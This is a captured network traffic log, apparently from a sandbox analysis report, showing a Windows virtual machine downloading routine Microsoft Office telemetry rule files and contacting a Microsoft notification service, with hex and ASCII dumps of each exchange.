Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	49720	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:18 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:18 UTC	492	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:18 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Sun, 03 Nov 2024 10:28:28 GMT ETag: "0x8DCFBF241C15278" x-ms-request-id: bcb504eb-401e-0035-19e9-2d82d8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163118Z-16547b76f7f4k79zhC1DFWu9y000000003x000000000kkpa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:18 UTC	15892	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-04 16:31:18 UTC	16384	IN	Data Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
2024-11-04 16:31:19 UTC	16384	IN	Data Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	49721	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:19 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 72 2b 57 68 33 33 56 48 65 45 32 7a 4b 76 4e 43 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 66 39 62 63 61 39 35 33 35 66 65 65 39 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: r+Wh33VHeE2zKvNC.1Context: def9bca9535fee95
2024-11-04 16:31:19 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-04 16:31:19 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 72 2b 57 68 33 33 56 48 65 45 32 7a 4b 76 4e 43 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 66 39 62 63 61 39 35 33 35 66 65 65 39 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 51 6e 50 35 6e 79 30 73 4f 50 46 38 2f 39 73 66 6b 6b 38 39 4a 49 68 73 36 7a 75 59 33 54 4c 6a 75 30 65 6d 73 75 46 63 42 6e 7a 37 38 4b 75 4f 38 55 75 44 74 45 35 6b 53 35 57 7a 4b 72 59 62 46 41 6d 30 2b 69 35 59 47 65 7a 35 6b 70 78 7a 48 67 50 30 57 67 77 53 71 32 4b 58 35 76 37 69 79 51 51 43 42 64 65 77 6a 45 45 36 4c Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: r+Wh33VHeE2zKvNC.2Context: def9bca9535fee95<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAQnP5ny0sOPF8/9sfkk89JIhs6zuY3TLju0emsuFcBnz78KuO8UuDtE5kS5WzKrYbFAm0+i5YGez5kpxzHgP0WgwSq2KX5v7iyQQCBdewjEE6L
2024-11-04 16:31:19 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 72 2b 57 68 33 33 56 48 65 45 32 7a 4b 76 4e 43 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 66 39 62 63 61 39 35 33 35 66 65 65 39 35 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: r+Wh33VHeE2zKvNC.3Context: def9bca9535fee95
2024-11-04 16:31:20 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-04 16:31:20 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 37 78 4d 51 47 74 77 2f 4c 30 57 4b 44 77 50 6c 55 76 58 66 6c 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 7xMQGtw/L0WKDwPlUvXflQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.5	49722	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:20 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: a31f2de1-f01e-0096-7209-2d10ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163120Z-16547b76f7fmbrhqhC1DFWkds800000003w000000000nr14 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.5	49725	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:20 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:20 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: dcc6854f-e01e-0051-7b03-2d84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163120Z-16547b76f7f7lhvnhC1DFWa2k000000003pg00000000ubsp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49726	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:20 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 9ed6ffec-f01e-0020-8058-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163120Z-176bd8f9bc585r8thC1DFW1vw0000000055g00000000epra x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:21 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49723	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:20 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:21 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:21 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 2b224279-e01e-001f-7555-2e1633000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163121Z-176bd8f9bc585r8thC1DFW1vw000000005a00000000084ms x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
